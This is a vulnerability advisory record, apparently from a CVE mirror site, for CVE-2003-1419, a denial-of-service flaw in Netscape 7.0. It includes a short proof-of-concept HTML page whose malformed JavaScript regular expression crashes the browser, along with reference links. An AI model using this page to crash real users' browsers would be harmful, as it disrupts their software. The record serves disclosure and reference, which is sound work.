Netscape JavaScript Regular Expression Denial of Service Vulnerability

Vulnerability ID: 1107222
Vulnerability type: Input validation
Published: 2003-02-25
Updated: 2003-12-31
CVE ID: CVE-2003-1419
CNNVD-ID: CNNVD-200312-344
Platform: Unix
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/22287
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-344
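|Vulnerability details
A vulnerability exists in Netscape 7.0. A remote attacker can cause a denial of service (crash) via a web page in which the JavaScript reformatDate function is given an invalid regular expression argument.
|Exploit (EXP)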
source: http://www.securityfocus.com/bid/6959/info

It has been reported that Netscape based browsers may be vulnerable to a denial of service condition when executing certain JavaScript methods.

If a malicious page containing a specially crafted JavaScript regular expression method is viewed, the browser reportedly becomes unstable; this may result in the critical failure of an affected browser.

This vulnerability was reported for Netscape version 7. It is not known if previous versions are also affected. 

<html>
<head>
<title>test</title>
<--script-- language="JavaScript">
function reformatDate(someDate) {
var tokens = someDate.split(/(/|-)/);
if (tokens[1].length == 1) tokens[1] = "0" + tokens[1];
if (tokens[0].length == 1) tokens[0] = "0" + tokens[0];
var result = tokens[2] + tokens[1] + tokens[0];
alert(result);
//return result;
}
</--script-->
</head>
<body>
<form action="" method="GET" name="form1" onSubmit="return reformatDate(this.dt.value);">
MM/DD/YYYY - <input type=text name=dt>
<input type=submit>
</form>
</body>
</html>
|References

Source: XF
Name: netscape-javascript-reformatdate-dos(11444)
Link: http://xforce.iss.net/xforce/xfdb/11444
Source: BID
Name: 6959
Link: http://www.securityfocus.com/bid/6959
Source: BUGTRAQ
Name: 20030225 Re: Netscape 6/7 crashes by a simple stylesheet…
Link: http://archives.neohapsis.com/archives/bugtraq/2003-02/0338.html
